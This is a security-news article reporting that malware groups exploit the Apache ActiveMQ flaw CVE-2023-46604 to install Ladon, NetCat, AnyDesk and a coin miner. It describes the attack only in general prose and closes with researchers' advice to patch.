A Remote Code Execution (RCE) vulnerability in Apache ActiveMQ servers (CVE-2023-46604) is continually being exploited by several malware groups, including Kinsing, GoTitan, and HelloKitty, among others. Subsequent developments have revealed that threat actors employ increasingly sophisticated malware, including Ladon, NetCat, and z0Miner.
Cybersecurity researchers from ASEC AhnLab have discovered this new malware set to leverage the RCE vulnerability. Unpatched servers exposed to external networks are susceptible to exploitation, allowing threat actors to execute malicious commands remotely.
The attack methodology targets a serialised class within the OpenWire protocol, enabling the instantiation of a class in the classpath. The attacker transits a manipulated packet to the server, which contains a URL leading to the loading of an XML file. This file then executes predefined commands.
Ladon
Ladon, a threat tool predominantly used by Chinese threat actors, plays a central role in this process.
Beyond its scanning capabilities for the CVE-2023-46604 vulnerability, Ladon offers various other features, including account credential theft, reverse shell and privilege escalation capabilities.
The attacker deploys PowerShell commands on the vulnerable Apache ActiveMQ service and downloads Ladon.
The subsequent execution of a reverse shell command facilitated further control over the compromised system.
NetCat
The NetCat utility, recognised for its ability to transmit data over TCP/UDP, featured prominently in the attack landscape. While Ladon leveraged NetCat for its reverse shell command, other instances revealed NetCat being downloaded from another source.
This tool supports both Linux and Windows and facilitates network testing activities while presenting exploitable features for threat actors. In a noteworthy twist, the attacker, post-NetCat deployment, opted to install AnyDesk, a remote administration tool. AnyDesk was silently installed with a password set through a PowerShell command, following the established pattern observed in previous attacks.
z0Miner
The researchers also unveiled the installation of XMRig CoinMiner, known as z0Miner, marked by the presence of an XML file named ‘paste.xml’. This file executed CMD to trigger PowerShell commands, subsequently downloading the CoinMiner.
Upon further analysis, researchers discovered the strain to be similar to that reported in 2020, associated with exploits that targeted Oracle Weblogic and Atlassian Confluence RCE vulnerabilities in 2021.
The consequences of these attacks extend beyond mere system compromise, ranging from cryptocurrency mining operations to data theft and ransomware installations. Researchers have urged system administrators to update the Apache ActiveMQ to mitigate the potential threats.
In the News: Telecommunications Bill 2023 expands government’s digital control
